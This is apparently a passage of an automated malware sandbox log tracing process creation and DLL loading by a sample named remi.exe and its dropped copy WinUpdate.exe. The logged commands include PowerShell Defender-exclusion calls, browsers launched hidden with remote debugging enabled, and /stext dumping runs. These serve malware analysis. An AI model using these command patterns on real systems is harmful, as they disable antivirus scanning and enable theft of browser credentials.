                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess created: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe /stext "C:\Users\user\AppData\Local\Temp\mgfharkyxdkunkmiffxvayibdtasarj"
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1972,i,12355548801112023656,6493178295875206895,262144 /prefetch:8
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe"
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess created: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe"
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess created: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe"
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe"
                    Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2984 --field-trial-handle=2680,i,13951100852068889132,5640976159608311399,262144 /prefetch:3
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1504 --field-trial-handle=1976,i,6555542127114482677,3967349702858175070,262144 /prefetch:3
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess created: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe"
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess created: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe"
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5380 --field-trial-handle=2680,i,13951100852068889132,5640976159608311399,262144 /prefetch:8
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6664 --field-trial-handle=2680,i,13951100852068889132,5640976159608311399,262144 /prefetch:8
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7104 --field-trial-handle=2680,i,13951100852068889132,5640976159608311399,262144 /prefetch:8
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7104 --field-trial-handle=2680,i,13951100852068889132,5640976159608311399,262144 /prefetch:8
                    Source: C:\Users\user\Desktop\remi.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\remi.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\remi.exeProcess created: C:\Users\user\Desktop\remi.exe "C:\Users\user\Desktop\remi.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\remi.exeProcess created: C:\Users\user\Desktop\remi.exe "C:\Users\user\Desktop\remi.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\remi.exeProcess created: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess created: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess created: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess created: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe /stext "C:\Users\user\AppData\Local\Temp\zkuwzgocnnacbxcaejqamgtb"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess created: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe /stext "C:\Users\user\AppData\Local\Temp\beapzzzejvshdeqenuduxtnkcfqj"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess created: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe /stext "C:\Users\user\AppData\Local\Temp\mgfharkyxdkunkmiffxvayibdtasarj"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"Jump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1972,i,12355548801112023656,6493178295875206895,262144 /prefetch:8
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess created: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe"
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess created: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe"
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1504 --field-trial-handle=1976,i,6555542127114482677,3967349702858175070,262144 /prefetch:3
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess created: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe"
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess created: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe"
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2984 --field-trial-handle=2680,i,13951100852068889132,5640976159608311399,262144 /prefetch:3
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5380 --field-trial-handle=2680,i,13951100852068889132,5640976159608311399,262144 /prefetch:8
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6664 --field-trial-handle=2680,i,13951100852068889132,5640976159608311399,262144 /prefetch:8
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7104 --field-trial-handle=2680,i,13951100852068889132,5640976159608311399,262144 /prefetch:8
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7104 --field-trial-handle=2680,i,13951100852068889132,5640976159608311399,262144 /prefetch:8
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: riched20.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: usp10.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: msls31.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: riched20.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: usp10.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: msls31.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: appresolver.dllJump to behavior
